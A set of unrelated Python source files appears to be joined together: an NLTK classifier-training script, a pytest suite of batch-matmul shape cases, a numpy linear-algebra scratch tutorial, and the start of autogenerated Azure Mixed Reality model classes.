
    :param training_set: labeled feature sets used for training
    :param testing_set: labeled feature sets used for accuracy evaluation
    """
    clf = NaiveBayesClassifier.train(training_set)
    accuracy_pct = classify.accuracy(clf, testing_set) * 100
    print('Naive Bayes model accuracy:', accuracy_pct)
    clf.show_most_informative_features(15)
    target_path = os.path.join(utils.get_project_root(),
                               'data/classifiers/naive_bayes_5k.pickle')
    with open(target_path, 'wb') as out:
        pickle.dump(clf, out)
def train_mnb_clf(training_set, testing_set):
    """Train a Multinomial Naive Bayes classifier (via NLTK's sklearn
    bridge), print its test accuracy (historically ~73.28) and pickle it.

    :param training_set: labeled feature sets used for training
    :param testing_set: labeled feature sets used for accuracy evaluation
    """
    clf = SklearnClassifier(MultinomialNB())
    clf.train(training_set)
    accuracy_pct = classify.accuracy(clf, testing_set) * 100
    print("Multinomial NB Classifier accuracy:", accuracy_pct)
    target_path = os.path.join(utils.get_project_root(),
                               'data/classifiers/mnb_classifier_5k.pickle')
    with open(target_path, 'wb') as out:
        pickle.dump(clf, out)
def train_bernoulli_nb_clf(training_set, testing_set):
    """Train a Bernoulli Naive Bayes classifier (via NLTK's sklearn
    bridge), print its test accuracy (historically ~74.64) and pickle it.

    :param training_set: labeled feature sets used for training
    :param testing_set: labeled feature sets used for accuracy evaluation
    """
    clf = SklearnClassifier(BernoulliNB())
    clf.train(training_set)
    accuracy_pct = classify.accuracy(clf, testing_set) * 100
    print("Bernoulli NB Classifier accuracy:", accuracy_pct)
    target_path = os.path.join(
        utils.get_project_root(),
        'data/classifiers/bernoulli_nb_classifier_5k.pickle')
    with open(target_path, 'wb') as out:
        pickle.dump(clf, out)
def train_logistic_regression_clf(training_set, testing_set):
    """Train a logistic-regression classifier (via NLTK's sklearn bridge),
    print its test accuracy (historically ~74.59) and pickle it.

    :param training_set: labeled feature sets used for training
    :param testing_set: labeled feature sets used for accuracy evaluation
    """
    clf = SklearnClassifier(LogisticRegression())
    clf.train(training_set)
    accuracy_pct = classify.accuracy(clf, testing_set) * 100
    print('Logistic Regression Classifier accuracy:', accuracy_pct)
    target_path = os.path.join(
        utils.get_project_root(),
        'data/classifiers/logistic_regression_classifier_5k.pickle')
    with open(target_path, 'wb') as out:
        pickle.dump(clf, out)
def train_linear_svc_clf(training_set, testing_set):
    """Train a linear SVM classifier (via NLTK's sklearn bridge), print its
    test accuracy (historically ~72.01) and pickle it.

    :param training_set: labeled feature sets used for training
    :param testing_set: labeled feature sets used for accuracy evaluation
    """
    clf = SklearnClassifier(LinearSVC())
    clf.train(training_set)
    accuracy_pct = classify.accuracy(clf, testing_set) * 100
    print("LinearSVC Classifier accuracy:", accuracy_pct)
    target_path = os.path.join(
        utils.get_project_root(),
        'data/classifiers/linear_svc_classifier_5k.pickle')
    with open(target_path, 'wb') as out:
        pickle.dump(clf, out)
if __name__ == "__main__":
    # Build feature sets once and share the same train/test split across
    # all classifiers so their reported accuracies are comparable.
    feature_sets = get_feature_sets()
    training_set, testing_set = split_train_test_dataset(feature_sets)

    # relatively quick to train
    train_naive_bayes_clf(training_set, testing_set)
    train_mnb_clf(training_set, testing_set)
    train_linear_svc_clf(training_set, testing_set)
    train_bernoulli_nb_clf(training_set, testing_set)
    train_logistic_regression_clf(training_set, testing_set)
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
batch_norm
"""
import os
import pytest
from tests.common.base import TestBase
class TestCase(TestBase):
    """Pytest suite for the akg ``batchmatmul`` operator (batchmatmul_run cases)."""
    def setup(self):
        """Register the batchmatmul argument tables consumed by the run methods.
        Each entry is (caseflag, opfuncname, testRunArgs[, dimArgs]); per the
        column comments below, testRunArgs unpacks as
        (bs, m, n, k, bias_shape, dtype, <bool>, <bool>, kernel_name).
        NOTE(review): the two booleans are presumably trans_a/trans_b (see the
        "trans_a and trans_b both true" comment further down) — confirm.
        """
        case_name = "test_akg_batchmatmul_run_001"
        case_path = os.getcwd()
        self.params_init(case_name, case_path)
        self.caseresult = True
        self._log.info("============= {0} Setup case============".format(self.casename))
        # Default table: mini-environment CI cases.
        self.testarg = [
            # caseflag, opfuncname, testRunArgs, dimArgs
            # bs, m, n, k, bias_shape, dtype, kernel_name, attrs
            ("batch_matmul_001", "batchmatmul_run",
             ((4,), 16, 48, 32, (1,), "float32", False, True, "batch_matmul_output")),
            #("batch_matmul_002", "batchmatmul_run",
            # ((4,), 16, 48, 32, (48,), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_003", "batchmatmul_run",
             ((4,), 16, 48, 32, (4, 16, 48), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_004", "batchmatmul_run", ((), 16, 48, 32, (), "float32", True, False, "batch_matmul_output")),
            ("batch_matmul_005", "batchmatmul_run", ((), 16, 48, 32, (), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_006", "batchmatmul_run",
             ((4, 2), 16, 48, 32, (1, 1), "float32", False, False, "batch_matmul_output")),
            #("batch_matmul_007", "batchmatmul_run",
            # ((4, 2), 16, 48, 32, (1, 48), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_008", "batchmatmul_run",
             ((4, 2), 16, 48, 32, (4, 2, 16, 48), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_009", "batchmatmul_run",
             ((4, 2), 16, 48, 32, (), "float32", True, False, "batch_matmul_output")),
            ("batch_matmul_010", "batchmatmul_run",
             ((8, 16), 128, 128, 64, (), "float32", False, True, "batch_matmul_output")),
            ############################
            # for bert small case add by mini in ci
            ############################
            # ("matmul_0033", "batchmatmul_run", ((), 3072, 768, 8192, (), "float16", True, False, "batch_matmul_bert")),
            # ("matmul_0037", "batchmatmul_run", ((), 33, 64, 16384, (), "float32", True, False, "batch_matmul_bert")),
            ("matmul_0053", "batchmatmul_run", ((), 32000, 768, 20, (), "float32", True, False, "batch_matmul_bert")),
            ('matmul_0060', "batchmatmul_run", ((), 20, 768, 32000, (), 'float32', False, False, 'batchmatmul_bert')),
            ('matmul_0061', "batchmatmul_run", ((128,), 768, 64, 128, (), 'float32', False, False, 'batchmatmul_bert')),
            # ('matmul_0062', "batchmatmul_run", ((), 16384, 6384, 33, (), 'float32', True, False, 'batchmatmul_bert')),
            ('matmul_0063', "batchmatmul_run", ((), 32000, 768, 20, (), 'float32', False, False, 'batchmatmul_bert')),
        ]
        # Cloud-environment table.
        self.testarg_cloud = [
            # caseflag, opfuncname, testRunArgs, dimArgs
            # bs, m, n, k, bias_shape, dtype, kernel_name, attrs
            (
                "batch_matmul_001", "batchmatmul_run", ((), 16, 48, 32, (1,), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_002", "batchmatmul_run",
             ((), 16, 48, 32, (48,), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_003", "batchmatmul_run",
             ((), 16, 48, 32, (1, 1), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_004", "batchmatmul_run",
             ((), 16, 48, 32, (16, 1), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_005", "batchmatmul_run",
             ((), 16, 48, 32, (1, 48), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_006", "batchmatmul_run",
             ((), 16, 48, 32, (16, 48), "float32", False, True, "batch_matmul_output")),
            # ("batch_matmul_007", "batchmatmul_run", ((64, 12), 128, 128, 64, (), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_001", "batchmatmul_run",
             ((1,), 128, 128, 1, (), "float32", False, False, "batch_matmul_output")),
        ]
        # RPC-cloud table (includes BERT/LeNet shapes; some entries are slow).
        self.testarg_rpc_cloud = [
            # caseflag, opfuncname, testRunArgs, dimArgs
            # bs, m, n, k, bias_shape, dtype, kernel_name, attrs
            # 4D
            # ("batch_matmul_4D_001", "batchmatmul_run", ((128,), 128, 64, 768, (), "float32", True, False, "batch_matmul_output")),
            # ("batch_matmul_4D_002", "batchmatmul_run", ((64, 12), 128, 64, 128, (), "float32", False, False, "batch_matmul_output")),
            # ("batch_matmul_4D_003", "batchmatmul_run", ((128,), 768, 128, 64, (), "float32", False, True, "batch_matmul_output")),
            # ("batch_matmul_4D_004", "batchmatmul_run", ((64, 12), 128, 128, 64, (), "float32", False, True, "batch_matmul_output")),
            # ("batch_matmul_4D_005", "batchmatmul_run", ((128,), 768, 64, 128, (), "float32", False, False, "batch_matmul_output")),
            # caseflag, opfuncname, testRunArgs, dimArgs
            # bs, m, n, k, bias_shape, dtype, kernel_name, attrs
            ("batch_matmul_007", "batchmatmul_run",
             ((64, 12), 128, 128, 64, (), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_007", "batchmatmul_run",
             ((1, 12), 128, 128, 64, (), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_001", "batchmatmul_run",
             ((1, 12), 128, 64, 128, (), "float32", False, False, "batch_matmul_output")),
            # Matrix (2D)
            ("batch_matmul_2D_001", "batchmatmul_run",
             ((), 8192, 3072, 768, (), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_2D_007", "batchmatmul_run",
             ((), 64, 2, 768, (), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_2D_008", "batchmatmul_run",
             ((), 8192, 768, 21128, (), "float32", False, False, "batch_matmul_output"),
             ((16, 16), (16, 16), (16, 16))),
            ("batch_matmul_2D_009", "batchmatmul_run",
             ((), 8192, 768, 3072, (), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_2D_012", "batchmatmul_run",
             ((), 64, 768, 2, (), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_2D_013", "batchmatmul_run",
             ((), 8192, 768, 2, (), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_2D_014", "batchmatmul_run",
             ((), 8192, 768, 768, (), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_2D_015", "batchmatmul_run",
             ((), 64, 768, 768, (), "float32", False, False, "batch_matmul_output")),
            ("batch_matmul_2D_016", "batchmatmul_run",
             ((), 21128, 768, 8192, (), "float32", False, True, "batch_matmul_output")),
            ("batch_matmul_2D_017", "batchmatmul_run",
             ((), 768, 768, 1280, (), "float32", True, False, "batch_matmul_output")),
            # # float - float:[64, 16, 128, 64] - [64, 16, 128, 64] = float:[64, 16, 128, 128]
            ("batch_matmul_4D_001", "batchmatmul_run",
             ((64, 16), 128, 128, 64, (), "float32", False, True, "batch_matmul_output")),
            # float - float:[8, 16, 128, 64] - [8, 16, 128, 64] = float:[8, 16, 128, 128]
            ("batch_matmul_4D_002", "batchmatmul_run",
             ((8, 16), 128, 128, 64, (), "float32", False, True, "batch_matmul_output")),
            # float - float:[64, 16, 128, 128] - [64, 16, 128, 64] = float:[64, 16, 128, 64]
            ("batch_matmul_4D_003", "batchmatmul_run",
             ((64, 16), 128, 64, 128, (), "float32", False, False, "batch_matmul_output")),
            # float - float:[8, 16, 128, 128] - [8, 16, 128, 64] = float:[8, 16, 128, 64]
            ("batch_matmul_4D_004", "batchmatmul_run",
             ((8, 16), 128, 64, 128, (), "float32", False, False, "batch_matmul_output")),
            # half - half:[128, 768, 128] - [128, 768, 64] = half:[128, 128, 64]
            ("batch_matmul_3D_005", "batchmatmul_run",
             ((128,), 128, 64, 768, (), "float16", True, False, "batch_matmul_output")),
            # half - half:[64, 12, 128, 128] - [64, 12, 128, 64] = half:[64, 12, 128, 64]
            ("batch_matmul_4D_006", "batchmatmul_run",
             ((64, 12), 128, 64, 128, (), "float16", False, False, "batch_matmul_output")),
            # # half - half:[128, 768, 64] - [128, 128, 64] = half:[128, 768, 128]
            ("batch_matmul_3D_007", "batchmatmul_run",
             ((128,), 768, 128, 64, (), "float16", False, True, "batch_matmul_output")),
            # # half - half:[64, 12, 128, 64] - [64, 12, 128, 64] = half:[64, 12, 128, 128]
            ("batch_matmul_4D_008", "batchmatmul_run",
             ((64, 12), 128, 128, 64, (), "float16", False, True, "batch_matmul_output")),
            # # half - half:[128, 768, 128] - [128, 128, 64] = half:[128, 768, 64]
            ("batch_matmul_3D_009", "batchmatmul_run",
             ((128,), 768, 64, 128, (), "float16", False, False, "batch_matmul_output")),
            # cost a long time
            # 3461 seconds for below this by run on 1980
            # ("batch_matmul_2D_17", "batchmatmul_run", ((), 30522, 1024, 1280, False, "float32", True, True, "batch_matmul_output"), ((32, 32), (32, 32), (32, 32))),
            # 3569 seconds for below this by run on 1980
            # ("batch_matmul_2D_29", "batchmatmul_run", ((), 1280, 1024, 30522, False, "float32", False, False, "batch_matmul_output"), ((32, 32), (32, 32), (32, 32))),
            # fail for now,
            # As do not support that trans_a and trans_b both true:
            # ("batch_matmul_2D_27", "batchmatmul_run", ((), 1024, 1024, 64, False, "float32", True, True, "batch_matmul_output")),
            # half - half:[8192, 3072] - [768, 3072] = half:[8192, 768]
            ("matmul_0043", "batchmatmul_run",
             ((), 8192, 768, 3072, (), "float16", False, True, "batch_matmul_output_fp16")),
            # half - half:[8192, 768] - [3072, 768] = half:[8192, 3072]
            ("matmul_0044", "batchmatmul_run",
             ((), 8192, 3072, 768, (), "float16", False, True, "batch_matmul_output_fp16")),
            # half - half:[8192, 768] - [768, 768] = half:[8192, 768]
            ("matmul_0048", "batchmatmul_run",
             ((), 8192, 768, 768, (), "float16", False, False, "batch_matmul_output_fp16")),
            # error: Not all Vars are passed in api_args: 'cc5' 'cc5' 'cc5' does not appear in api_args
            # ("matmul_0029", "batchmatmul_run", ((), 768, 768, 8192, (), "float16", True, False, "batch_matmul_output"), ((1,1),(16,1),(1024,1))),
            # ("matmul_0033", "batchmatmul_run", ((), 3072, 768, 8192, (), "float16", True, False, "batch_matmul_output"), ((1,1),(16,1),(1024,1))),
            ("matmul_0036", "batchmatmul_run",
             ((), 768, 3072, 768, (), "float16", False, False, "batch_matmul_output_fp16")),
            # half - half:[8192, 768] - [768, 3072] = half:[8192, 3072]
            ("matmul_0035", "batchmatmul_run",
             ((), 8192, 3072, 768, (), "float16", False, False, "batch_matmul_output_fp16")),
            # # half - half:[8192, 3072] - [3072, 768] = half:[8192, 768]
            ("matmul_0052", "batchmatmul_run",
             ((), 8192, 768, 3072, (), "float16", False, False, "batch_matmul_output_fp16")),
            # lenet
            ('matmul_lenet_001_fp32', "batchmatmul_run", ((), 1, 120, 784, (120,), 'float32', False, True, 'batchmatmul_output')),
            ('matmul_lenet_002_fp32', "batchmatmul_run", ((), 1, 84, 120, (84,), 'float32', False, True, 'batchmatmul_output')),
            ('matmul_lenet_003_fp32', "batchmatmul_run", ((), 1, 10, 84, (10,), 'float32', False, True, 'batchmatmul_output')),
            ('matmul_lenet_004_fp32', "batchmatmul_run", ((), 10, 84, 1, (), 'float32', True, False, 'batchmatmul_output')),
            ('matmul_lenet_005_fp32', "batchmatmul_run", ((), 1, 84, 10, (), 'float32', False, False, 'batchmatmul_output')),
            ('matmul_lenet_006_fp32', "batchmatmul_run", ((), 84, 120, 1, (), 'float32', True, False, 'batchmatmul_output')),
            ('matmul_lenet_007_fp32', "batchmatmul_run", ((), 1, 120, 84, (), 'float32', False, False, 'batchmatmul_output')),
            ('matmul_lenet_008_fp16', "batchmatmul_run", ((), 120, 784, 1, (), 'float16', True, False, 'batchmatmul_output')),
            ('matmul_lenet_009_fp16', "batchmatmul_run", ((), 1, 784, 120, (), 'float32', False, False, 'batchmatmul_output')),
        ]
        return
    @pytest.mark.level0
    @pytest.mark.platform_arm_ascend_training
    @pytest.mark.platform_x86_ascend_training
    @pytest.mark.env_onecard
    def test_run(self):
        """Run the default (mini CI) argument table.
        :return:
        """
        self.common_run(self.testarg)
    def test_run_cloud(self):
        """Run the cloud argument table.
        :return:
        """
        self.common_run(self.testarg_cloud)
    def test_rpc_cloud(self):
        """Run only the first rpc-cloud case.
        NOTE(review): the full table is skipped here, presumably because some
        entries take thousands of seconds (see comments above) — confirm.
        :return:
        """
        self.common_run([self.testarg_rpc_cloud[0]])
    def teardown(self):
        """
        clean environment
        :return:
        """
        self._log.info("============= {0} Teardown============".format(self.casename))
        return
|
# linear algebra python
# Scratch/tutorial script walking through numpy.linalg; most experiments are
# left commented out so individual examples can be re-enabled one at a time.
# https://www.google.com/search?q=linear+algebra+python&sxsrf=ALeKk00bAclhj18xCwEbKZ27J5UMzPRTfA%3A1621259417578&ei=mXSiYPXXItqNr7wPzoSXsAY&oq=linear+al&gs_lcp=Cgdnd3Mtd2l6EAMYATIECCMQJzIECAAQQzIECAAQQzIECC4QQzICCAAyBQgAEMsBMgUIABDLATICCAAyAggAMgIILjoHCCMQsAMQJzoHCAAQRxCwAzoHCAAQsAMQQzoFCAAQkQI6CggAELEDEIMBEEM6CwgAELEDEIMBEJECUOSkAVjptQFg5cABaAFwAngAgAHIAYgBiA2SAQUwLjkuMZgBAKABAaoBB2d3cy13aXrIAQrAAQE&sclient=gws-wiz
import numpy as np
from numpy import linalg as la
import time
'''
pinv, dot, matmul, multi_dot, arrays vs matrix vs vectors,
vdot, inner, outer, einsum/ einsum_path, matrix_power, kron,
decomposition, cond, det, solve, lstsq, inv
'''
# ---------- dot: product of two arrays -----------
m = np.arange(3) - 3
# print(m)
n = np.arange(3) - 2
# print(n)
# print(np.dot(m, n))
# print(np.dot(2, 3))
a = [[1, 0], [0, 1]]
b = [[4, 1], [2, 2]]
# print(np.dot(a, b))
a = np.arange(2*3*4).reshape((2, 3, -1))
# b = np.arange(3*4*5*6)[::-1].reshape((5, 4, 6, 3))
# print(a)
# print(b)
# ---------- multi_dot: product of two or more arrays -----------
A = np.random.random((5, 4))
B = np.random.random((4, 3))
C = np.random.random((3, 6))
D = np.random.random((6, 2))
# print(la.multi_dot([A, B, C, D]))
# ---------- vdot: product of two vectors -----------
# complex conjugate: a+bj vs a-bj
a = np.array([1+2j, 3+4j])
b = np.array([5+6j, 7+8j])
# print(np.vdot(a, b))
a = np.array([[1, 4], [5, 6], [5, 6]])
b = np.array([[4, 1], [2, 2], [5, 6]])
# print(np.vdot(a, b))
# ---------- inner: Inner product of two arrays -----------
# scalars (the inner product of two 1-D arrays reduces to a scalar)
a = np.arange(3) - 1
b = np.arange(3) - 2
# print(np.inner(a, b))
a = np.arange(12).reshape((2, 3, -1))
# print(a)
b = np.arange(2)
# print(b)
# print(np.inner(a, b))
# b = 1 -> b scalar
# print(np.inner(np.eye(3), 1))
# ---------- outer : outer product of two arrays -----------
rl = np.outer(np.ones((5, )), np.linspace(-2, 2, 5))
# print(rl)
# print(np.ones((5, )))
# print(np.linspace(-2, 2, 5))
im = np.outer(1j*np.linspace(2, -2, 5), np.ones((5, )))
# print(im)
# grid for computing a Mandelbrot set
# print(rl + im)
# dtype
x = np.array(['a', 'b', 'c'], dtype=object)
# print(np.outer(x, [1, 2, 1]))
# ---------- matmul: matrix product of two arrays -----------
a = np.ones([9, 5, 7, 4])
c = np.ones([9, 5, 4, 3])
# print(a)
# print(c)
# # using shape to get dismensions
# print(np.dot(a, c).shape)
# print(np.matmul(a, c).shape)
a = np.array([[1, 0],
              [0, 1]])
b = np.array([[4, 1],
              [2, 2]])
# print(np.matmul(a, b))
a = np.arange(2 * 2 * 4).reshape((2, 2, 4))
b = np.arange(2 * 2 * 4).reshape((2, 4, 2))
# print(np.matmul(a, b).shape)
# print(np.matmul(a, b)[0, 1, 1])
# print(sum(a[0, 1, :]*b[0, :, 1]))
# print(np.matmul([2j, 3j], [2j, 3j]))
a = np.array([2j, 3j])
b = np.array([2j, 3j])
# print(a @ b)
# ---------- tensordot: tensor dot product along specified axes -----------
# axes = 0, 1, 2
# the first two arguments chiefly determine the matrix multiplication
a = np.arange(6.).reshape(1, 2, -1)
b = np.arange(4.).reshape(2, 1, -1)
c = np.tensordot(a, b, axes=([1, 0], [0, 1]))
# c = np.tensordot(a, b, axes=([0, 1], [1, 0]))
# print(a)
# print()
# print(b)
# print()
# print(c.shape)
# d = np.zeros((3, 2))
# for i in range(3):
#     for j in range(2):
#         for k in range(1):
#             for n in range(2):
#                 d[i, j] += a[k, n, i] * b[n, k, j]
# print(d)
a = np.array(range(1, 9))
a.shape = (2, 2, 2)
A = np.array(('a', 'b', 'c', 'd'), dtype=object)
A.shape = (2, 2)
# when to use which axes value (0, 1, 2)?
res = np.tensordot(a, A, ((0, 1), (1, 0)))
# print(res.shape)
# ---------- einsum/ einsum_path: Einstein summation -----------
# https://numpy.org/doc/stable/reference/generated/numpy.einsum.html#numpy.einsum
a = np.arange(6.).reshape(1, 2, -1)
b = np.arange(4.).reshape(2, 1, -1)
# print(np.einsum('ijm,jik', a, b))
a = np.arange(25).reshape(5, 5)
b = np.arange(5)
c = np.arange(6).reshape(2, 3)
# print(np.einsum('ii', a))
# print(np.trace(a))
# print(np.einsum(a, [0, 0]))
# print(np.einsum('ii->i', a))
# print(np.diag(a))
# # Sum over an axis
# print(a)
# print(np.einsum('ij->i', a))
# print(np.sum(a, axis=1))
# print(np.sum(a, axis=0))
# print(np.einsum('...i->...', a))
# # matrix transpose
# print(np.einsum('ji', a))
# print(np.einsum('ij->ji', a))
# print(np.transpose(a))
# print(a.T)
# print(np.einsum(a, [1, 0]))
# # Vector inner products
# print(b)
# print(np.einsum('i,i', b, b))
# print(np.einsum(b, [0], b, [0]))
# print(np.dot(b, b.T))
# print(np.inner(b, b))
# # Matrix vector multiplication
# print(np.einsum('ij,j', a, b))
# print(np.einsum(a, [0, 1], b, [1]))  # ???
# print(np.dot(a, b))
# print(np.einsum('...j,j', a, b))  # ???
# # scalar multiplication
# print(np.einsum(',ij', 3, c))
# print(np.multiply(3, c))
# # Writeable returned arrays
# a = np.zeros((3, 3))
# np.einsum('ii->i', a)[:] = 1
# print(a)
# # Chained array operations. For more complicated contractions
# a = np.ones(64).reshape(2, 4, 8)
# # print(a)
# t0 = time.time()
# path = np.einsum_path('ijk,ilm,njm,nlk,abc->', a, a,
#                       a, a, a, optimize='optimal')[0]
# for item in range(500):
#     # _ = np.einsum('ijk,ilm,njm,nlk,abc->', a, a, a, a, a)
#     # _ = np.einsum('ijk,ilm,njm,nlk,abc->', a, a, a, a, a, optimize='optimal')
#     # _ = np.einsum('ijk,ilm,njm,nlk,abc->', a, a, a, a, a, optimize='greedy')
#     _ = np.einsum('ijk,ilm,njm,nlk,abc->', a, a, a, a, a, optimize=path)
# t1 = time.time()
# print(t1-t0)
# # ---------------- bonus :
# a = np.arange(25).reshape(5, 5)
# # print(a)
# print(np.average(a, axis=0))
# print(np.average(a, axis=1))
# ---------- matrix_power: matrix to power -----------
i = np.array([[0, 1], [-1, 0]])
# i = np.ones((3, 3))
# print(i)
# print(la.matrix_power(i, 0))
# print(la.matrix_power(i, -3))
# q = np.zeros((4, 4))
# q[0:2, 0:2] = -i
# q[2:4, 2:4] = i
# print(la.matrix_power(q, 2))
# ---------- kron: Kronecker product of two arrays -----------
# https://math.stackexchange.com/questions/1874581/why-use-the-kronecker-product
a = np.arange(3)
b = np.arange(3) - 2
# print(a)
# print(b)
# print(np.kron(a.T, b.T))
# print(np.kron([1, 10, 100], [5, 6, 7]))
# print(np.kron([5, 6, 7], [1, 10, 100]))
# # ones, zeros, eye
# print(np.kron(np.eye(2), np.ones((2, 2))))
a = np.arange(100).reshape((2, 5, 2, 5))
b = np.arange(24).reshape((2, 3, 4))
c = np.kron(a, b)
# print(c.shape)
# ---------- cholesky: Cholesky decomposition -----------
# https://www.sciencedirect.com/topics/engineering/cholesky-decomposition
A = np.array([[1, -2j], [2j, 5]])
# print(A)
L = la.cholesky(A)
# print(L)
# print(np.dot(L, L.T.conj()))
# if array_like
A = [[1, -2j], [2j, 5]]
# print(type(la.cholesky(A)))
# print(type(la.cholesky(np.matrix(A))))
# ---------- qr: qr decomposition -----------
# https://math.stackexchange.com/questions/198479/why-is-qr-factorization-useful-and-important
# https://en.wikipedia.org/wiki/Least_squares
# https://en.wikipedia.org/wiki/Orthonormality
a = np.random.randn(3, 2)
q, r = la.qr(a)
# print(q, r)
# print(r)
# print(np.allclose(a, np.dot(q, r)))
# print(la.qr(a, mode='r'))
A = np.array([[0, 1], [1, 1], [1, 1], [2, 1]])
b = np.array([1, 0, 2, 1])
q, r = la.qr(A)
p = np.dot(q.T, b)
# print(np.dot(np.linalg.inv(r), p))
# print(la.lstsq(A, b, rcond=None)[0])
# ---------- svd: svd decomposition -----------
# https://stats.stackexchange.com/questions/19607/what-is-the-point-of-singular-value-decomposition
a = np.random.randn(9, 6) + 1j*np.random.randn(9, 6)
b = np.random.randn(2, 7, 8, 3) + 1j*np.random.randn(2, 7, 8, 3)
u, s, vh = np.linalg.svd(a, full_matrices=True)
# print(u, s, vh)
# print(u.shape, s.shape, vh.shape)
# print(np.allclose(a, np.dot(u[:, :6] * s, vh)))
smat = np.zeros((9, 6), dtype=complex)
smat[:6, :6] = np.diag(s)
# print(np.allclose(a, np.dot(u, np.dot(smat, vh))))
u, s, vh = np.linalg.svd(a, full_matrices=False)
# print(np.allclose(a, np.dot(u * s, vh)))
smat = np.diag(s)
# print(np.allclose(a, np.dot(u, np.dot(smat, vh))))
# ---------- eig: eigenvalues and right eigenvectors -----------
# print(np.diag((1, 2, 3)))
w, v = la.eig(np.diag((1, 2, 3)))
# # columns vector
# print(w)
# # diag matrix
# print(v)
w, v = la.eig(np.array([[1, -1], [1, 1]]))
# print(w)
# print(v)
# ---------- eigh: Hermitian eigenvalues and eigenvectors -----------
# ---------- eigvals: eigenvalues of a general matrix -----------
# ---------- eigvalsh: Hermitian eigenvalues of a general matrix ----
# ---------- norm: Matrix or vector norm 02_part -----------
# ---------- cond: condition number -----------
a = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1]])
# print(la.cond(a))
# print(la.cond(a, 'fro'))
# print(la.cond(a, np.inf))
# ---------- det: determinant -----------
a = np.array([[1, 2], [3, 4]])
# a = np.array([[[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]]])
# print(la.det(a))
# ---------- matrix_rank: matrix rank of array -----------
# ---------- slogdet: sign and logarithm determinant -----------
(sign, logdet) = la.slogdet(a)
# print(sign)
# print(logdet)
# print(sign*np.exp(logdet))  # = det
# ---------- trace: sum along diagonals -----------
# print(np.trace(a))
# ---------- solve: Solve a linear matrix equation -----------
a = np.array([[1, 2], [3, 5]])
b = np.array([1, 2])
x = la.solve(a, b)
# print(x)
# print(np.allclose(np.dot(a, x), b))
# ---------- tensorsolve: Solve the tensor equation -----------
a = np.eye(2*3*4)
a.shape = (2*3, 4, 2, 3, 4)
b = np.random.randn(2*3, 4)
x = la.tensorsolve(a, b)
# print(x.shape)
# print(np.allclose(np.tensordot(a, x, axes=3), b))
# ---------- lstsq: least-squares solution -----------
x = np.array([0, 1, 2, 3])
y = np.array([-1, 0.2, 0.9, 2.1])
A = np.vstack([x, np.ones(len(x))]).T
m, c = la.lstsq(A, y, rcond=None)[0]
# print(m, c)
# ---------- inv: inverse of a matrix -----------
a = np.array([[1., 2.], [3., 4.]])
# print(type(a))
ainv = la.inv(a)
# print(ainv)
# print(np.allclose(np.dot(a, ainv), np.eye(2)))
# print(la.inv(np.matrix(a)))
a = np.array([[[1., 2.], [3., 4.]], [[1, 3], [3, 5]]])
# print(la.inv(a))
# ---------- pinv: pseudo inverse of a matrix -----------
a = np.random.randn(3, 2)
B = la.pinv(a)
# print(np.allclose(a, np.dot(a, np.dot(B, a))))
# print(np.allclose(B, np.dot(B, np.dot(a, B))))
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Dict, List, Optional, Union
from azure.core.exceptions import HttpResponseError
import msrest.serialization
from ._mixed_reality_client_enums import *
class AccountKeyRegenerateRequest(msrest.serialization.Model):
    """Payload asking the service to regenerate one of the account developer keys.

    :param serial: serial of key to be regenerated. Possible values include: 1, 2. Default value:
     "1".
    :type serial: str or ~mixed_reality_client.models.Serial
    """

    _attribute_map = {
        'serial': {'key': 'serial', 'type': 'int'},
    }

    def __init__(self, *, serial: Optional[Union[int, "Serial"]] = "1", **kwargs):
        super(AccountKeyRegenerateRequest, self).__init__(**kwargs)
        self.serial = serial
class AccountKeys(msrest.serialization.Model):
    """The developer keys of an account.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar primary_key: value of primary key.
    :vartype primary_key: str
    :ivar secondary_key: value of secondary key.
    :vartype secondary_key: str
    """

    _validation = {
        'primary_key': {'readonly': True},
        'secondary_key': {'readonly': True},
    }

    _attribute_map = {
        'primary_key': {'key': 'primaryKey', 'type': 'str'},
        'secondary_key': {'key': 'secondaryKey', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(AccountKeys, self).__init__(**kwargs)
        # Both keys are read-only: populated by the service, never sent.
        self.primary_key = None
        self.secondary_key = None
class CheckNameAvailabilityRequest(msrest.serialization.Model):
    """Body of a name-availability check request.

    All required parameters must be populated in order to send to Azure.

    :param name: Required. Resource Name To Verify.
    :type name: str
    :param type: Required. Fully qualified resource type which includes provider namespace.
    :type type: str
    """

    _validation = {
        'name': {'required': True},
        'type': {'required': True},
    }

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, *, name: str, type: str, **kwargs):
        super(CheckNameAvailabilityRequest, self).__init__(**kwargs)
        self.name = name
        self.type = type
class CheckNameAvailabilityResponse(msrest.serialization.Model):
